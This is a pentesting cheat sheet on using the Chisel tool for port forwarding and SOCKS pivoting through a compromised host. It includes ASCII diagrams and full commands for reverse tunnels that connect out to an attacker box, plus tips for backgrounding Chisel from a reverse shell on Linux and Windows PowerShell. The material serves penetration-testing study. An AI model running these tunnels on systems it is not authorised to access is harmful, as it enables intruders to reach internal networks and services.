Skip to main content

Port Forwarding with Chisel

GitHub

Download from the Releases Page


Usage

Requires a copy of the Chisel binary on:

  • The target host
  • The attacker's host.

Chisel also supports authenticated proxies to prevent unwanted connections.


Chisel Advantages

  • Chisel is a portable binary that can be run on the attack box or the target
    • Either party can host the chisel server on a chosen TCP port 
    • Because of this, there is a high amount of flexibility in situations where restrictions on connectivity exist
  • No dependencies on SSH daemons on the target
    • If the target is not running a SSH server, no problem



Example Usage

Chisel Server Running on Attack Box

./chisel server \													./chisel client \
--reverse \				Open 127.0.0.1:54321 on attack box			attackbox-ip:51234 \
--port 51234				as a reverse SOCKS proxy				R:127.0.0.1:54321:socks
 _______________													 _______________
|				| <==============[HTTP WebSocket]================[+]|				|
|				|													|				|
|  Attack Box	| -----------------[SSH Tunnel]-------------------> |  Target Box	|
| Chisel Server	|													| Chisel Client	|
|				| <==============[HTTP WebSocket]================[+]|				|
|_______________|													|_______________|


Chisel Server Running on Target

./chisel client \														./chisel server \
targetbox-ip:51234			Open 127.0.0.1:54321 on attack box			--socks5 \
54321:socks						as a forward SOCKS proxy				--port 51234
 _______________													 _______________
|				|[+]==============[HTTP WebSocket]================> |				|
|				|													|				|
|  Attack Box	| -----------------[SSH Tunnel]-------------------> |  Target Box	|
| Chisel Client	|													| Chisel Server	|
|				|[+]==============[HTTP WebSocket]================> |				|
|_______________|													|_______________|



Individual Port Forwarding

  • A service on a compromised host is listening on 127.0.0.1
  • Run the Chisel server on the target and connect from the attack box
  • Specify the port forward on the client
  • Open a port on attack box and forward traffic to remote port
./chisel client \																		./chisel server \
targetbox-ip:51234						Open 127.0.0.1:8001 on attack box				--socks5 \
127.0.0.1:8001:127.0.0.1:8001		and port forward to 127.0.0.1:8001 on target		--port 51234
   ^
   |_______ attack-ip:attack-port:target-ip:target-port
 
 _______________																		________________
|				|[+]=======================[HTTP WebSocket]==========================> |				|
|				|																	   |				|
|  Attack Box	| ---------------------------[SSH Tunnel]----------------------------> |  Target Box	|
| Chisel Client	|																	   | Chisel Server	|
|				|[+]=======================[HTTP WebSocket]==========================> |				|
|_______________|																	   |________________|



Reverse Individual Port Forwarding

  • A service on a compromised host is listening on 127.0.0.1
  • Run the Chisel server on the attack box in reverse mode and connect from the target
  • Specify the port forward on the client
  • Open a port on attack box and forward traffic to remote port
./chisel server \																		./chisel client \
--reverse \							Open 127.0.0.1:8001 on attack box					attackbox-ip:51234 \
--port 51234				and forward in reverse to 127.0.0.1:8001 on target			R:8001:127.0.0.1:8001
   ^																						^
   |___ Run in reverse mode																	|___ R:attack-port:target-address:target-port
   		allows the client to specify															 When using R: will bind to 127.0.0.1 on attack box
        remote port forwards
 
 _______________																		________________
|				| <========================[HTTP WebSocket]=========================[+]|				|
|				|																	   |				|
|  Attack Box	| ---------------------------[SSH Tunnel]----------------------------> |  Target Box	|
| Chisel Server	|																	   | Chisel Client	|
|				| <========================[HTTP WebSocket]=========================[+]|				|
|_______________|																	   |________________|



Forward Dynamic SOCKS Proxy

  • Run the Chisel server on the target box
  • Use the target box as a jump host to reach additional targets routable by the target
  • The traffic flows forward to the target box, which acts as a transparent SOCKS proxy
./chisel client \														./chisel server \
targetbox-ip:51234			Open 127.0.0.1:54321 on attack box			--socks5 \
54321:socks						as a forward SOCKS proxy				--port 51234
 _______________													 _______________
|				|[+]==============[HTTP WebSocket]================> |				|				   _________
|				|													|				|  -------------  |			|
|  Attack Box	| -----------------[SSH Tunnel]-------------------> |  Target Box	|  Proxy Traffic  | Remote  |
| Chisel Client	|													| Chisel Server	|  -------------  | Network |
|				|[+]==============[HTTP WebSocket]================> |				|				  |_________|
|_______________|													|_______________|



Reverse Dynamic SOCKS Proxy

  • Run the Chisel server on the attack box in reverse mode
  • Connect to the Chisel server from the target and specify a reverse port forward
  • The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy
./chisel server \													./chisel client \
--reverse \				Open 127.0.0.1:54321 on attack box			attackbox-ip:51234 \
--port 51234				as a reverse SOCKS proxy				R:127.0.0.1:54321:socks
 _______________													 _______________
|				| <==============[HTTP WebSocket]================[+]|				|				   _________
|				|													|				|  -------------  |			|
|  Attack Box	| -----------------[SSH Tunnel]-------------------> |  Target Box	|  Proxy Traffic  | Remote  |
| Chisel Server	|													| Chisel Client	|  -------------  | Network |
|				| <==============[HTTP WebSocket]================[+]|				|                 |_________|
|_______________|													|_______________|




Reverse Shell Tips

Run Chisel in the Background

Running chisel in the foreground in a reverse shell will render your shell useless, adding these notes here as a way to work around this.

Linux

Client Mode

# Background a process with '&'
# Example commmand
chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 &

Server Mode

# Background a process with '&'
# Example commmand
chisel server --port 8080 --reverse &


Windows

PowerShell

Client Mode

# Use the Start-Job cmdlet with a script block
# Example commmand
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:33060:127.0.0.1:3306','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $scriptBlock


Server Mode

Note that in server mode, you'll need to make sure your port is allowed through the firewall.

# Use the Start-Job cmdlet with a script block
# Example commmand
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $scriptBlock
Back to top